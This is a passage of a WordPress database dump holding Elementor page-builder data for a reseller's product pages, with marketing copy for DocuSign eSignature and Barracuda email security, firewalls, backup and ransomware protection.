pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignature\\u00ae but also the many options of a System of Agreement Platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ee4d73\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"be54357\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_2_2.png\",\"id\":2787}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b27bdc5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4901a06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d4ac2e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight customers with an easier way to do business<\\/h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><p>\\u00a0<\\/p><h3>DocuSign makes your business run better<\\/h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4e223a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3293733\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9b77d77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes<\\/strong><br \\/>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3cce57d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d877ca6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/keybenefits-1.png\",\"id\":2790}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"929ea92\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d6b3d6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aebc5f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/smb-keybenefits-2-2_07.png\",\"id\":2791}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"38090cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36463a9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Works with the applications, services and devices your business already uses<\\/strong><br \\/>DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e02ae5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"17fbd20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"769adff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>The reliable, globally-trusted service for electronic signatures<\\/strong><br \\/>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"55c966b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1ad9333\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/SMB.png\",\"id\":2792}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6134458\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"756a687\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"02b66c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Delight your customers, partners, and employees with a better way of doing business<\\/h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. It\\u2019s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.<\\/p><h3>Your company\'s digital future is here<\\/h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e5b10e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b13789b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ae5fa4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c090c5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"50b9d85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3776eb4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact Us\",\"typography_typography\":\"custom\",\"background_color\":\"#2679ad\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"10ce02f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d1ab04d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"324faac\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"485ca15\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b53ed9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"29c4155\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3155de2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dfcf6d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a48f45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e9cbe44\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"314b700\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9abd60e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"38e10f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"19ef0ffe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"11d7f34f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"14084c7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>DocuSign<\\/h2><h3>Grow your business.<br \\/>Shrink your paperwork.<\\/h3><h3>Delight customers with an easier way to do business<\\/h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/keybenefits-1.png\\\" alt=\\\"DocuSign signing experience in mobile device\\\" width=\\\"438\\\" height=\\\"212\\\" data-delta=\\\"1\\\" \\/><\\/h3><h3>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes<\\/h3><p>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,\\u00a0collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/smb-keybenefits-2-2_07.png\\\" alt=\\\"\\\" width=\\\"392\\\" height=\\\"184\\\" data-delta=\\\"1\\\" \\/><\\/h3><h3>Works with the applications, services and devices your business already uses<\\/h3><p>DocuSign fits right into your existing systems so you\\u2019ll be productive, instantly.\\u00a0Use DocuSign with over 300 popular services\\u00a0like Google, Salesforce and Box, or\\u00a0access our award-winning app\\u00a0from practically any mobile device. Works with virtually any kind of document.<\\/p><h3><img class=\\\"media-element file-default\\\" src=\\\"https:\\/\\/www.docusign.com\\/sites\\/default\\/files\\/SMB.png\\\" alt=\\\"\\\" width=\\\"460\\\" height=\\\"144\\\" data-delta=\\\"3\\\" \\/><\\/h3><h3>The reliable, globally-trusted service for electronic signatures<\\/h3><p>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.<\\/p><h2>\\u00a0<\\/h2><h3>Do more with the #1 eSignature platform for business<\\/h3><ul><li>Simple and fast setup gets you started immediately<\\/li><li>99.99% platform availability keeps your business running at all hours<\\/li><li>Flexible workflows to automate any agreement or approval process<\\/li><li>Rigorous security standards keep sensitive documents safe<\\/li><li>Instant visibility into document status and powerful reporting<\\/li><li>Full digital audit trail for easy compliance and legal enforceability<\\/li><\\/ul><p>[maxbutton id=\\\"1\\\" ]<\\/p><div><div><div><div class=\\\"row\\\"><div class=\\\"col-xs-12 col-sm-4\\\">\\u00a0<\\/div><div class=\\\"col-xs-12 col-sm-4\\\">\\u00a0<\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4742,2795,'_elementor_version','0.4'),(4749,2796,'_elementor_version','0.4'),(4756,2797,'_elementor_version','0.4'),(4759,1445,'_elementor_edit_mode','builder'),(4760,1445,'_elementor_template_type','post'),(4783,2803,'_elementor_template_type','post'),(4784,2803,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Barracuda\'s<\\/strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Email Protection<\\/h3><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Next-Generation Email Security<\\/strong><br \\/>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Network and Application Security<\\/h3><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/p><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Data Protection<\\/h3><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"space_between_widgets\":20},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Barracuda Backup<\\/h4><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h4>Cloud-to-Cloud Backup<\\/h4><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4766,1445,'_elementor_data','[{\"id\":\"1f0f085\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"14d59af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b5178a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Barracuda\'s<\\/strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a9478a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8127f88\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eb3aae7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Email Protection<\\/h2><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faac8d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f9ee8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/HuMxGXS6IxE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc2e5e3\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bd5ef2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a39876a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Next-Generation Email Security<\\/strong><\\/h2><p>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.<\\/p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4cfe734\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c295d29\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a0b772f\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/ds9fjUyPyoY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2be372d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"68631e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Network and Application Security<\\/h2><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data \\u2013 regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/h2><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Data Protection<\\/h2><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"space_between_widgets\":20},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Barracuda Backup<\\/h2><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h2>Cloud-to-Cloud Backup<\\/h2><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f36f0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89998d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5dad7ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Don\\u2019t Be a Ransomware Victim<\\/h2><h4>Ransomware is on the rise. Barracuda\\u2019s multi-layered defense protects your data (and your money).<\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16afbe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a2b893\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c2ff8c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Understanding Ransomware<\\/h2><p>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.<\\/p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.<\\/p><ul><li>47% of businesses have been affected by ransomware.<\\/li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.<\\/li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"147ae8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92b3892\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/zNkTopX68tk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38a9cde\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6089c4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0af1560\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.<\\/h5>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4c0aee\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ef21656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c2ba2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Detect\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"575ceaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5a62511\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df80f58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Prevent\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d782d44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8e73c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9a5394b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Recover\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dde960b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6db2b62\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2001646\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2f2451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Why is Backup Necessary for Office 365?<\\/h2><p>The number one cause of data loss in a SaaS deployment, such as Microsoft Office 365, is accidental data deletion. In fact, about 70 percent of all lost data is due to either accidental or malicious deletion of data by end-users. Other ways that data can be lost include misconfiguration, client sync issues, and most recently the widespread presence of malware and ransomware, which can render data unusable.<\\/p><p>Although Microsoft Office 365 provides some basic recovery options with the recycle bin and email retention, Microsoft\\u2019s primary focus within Office 365 is ensuring that service and data availability are not disrupted. It is your responsibility to protect the data that you store in the Office 365 cloud. Barracuda Cloud-to-Cloud Backup provides comprehensive, cost-effective, and scalable protection of your Office 365 data \\u2013without adding to your infrastructure costs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e0769b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"02b4dd5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca2ac7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>What We Protect<\\/h2><p>Barracuda\\u2019s Cloud-to-Cloud Backup Service backs up all of your Office 365 data to secure Barracuda Cloud Storage with no need for on-premises infrastructure. You can back up data on demand or according to an automated schedule. All Exchange Online, SharePoint Online, and OneDrive for Business data is deduplicated and compressed for maximum storage efficiency and reduced backup windows before being stored in the Barracuda Cloud.<\\/p><p>Exchange Online. Barracuda protects the complete folder structure of each user\\u2019s mailbox including all email message and attachments.<br \\/>OneDrive for Business. All files and folders under the Documents Library are protected.<br \\/>SharePoint Online. We protect SharePoint data including Document Libraries, Site Assets, and Picture Libraries within both Team Sites and Public Sites are protected.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c472b20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4fd4474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Fast and Easy Recovery Options<\\/h2><p>All Office 365 data backed up to the Barracuda Cloud is accessible, searchable, and retrievable from anywhere with an Internet connection. Data can be recovered from the site level down to the individual item level. 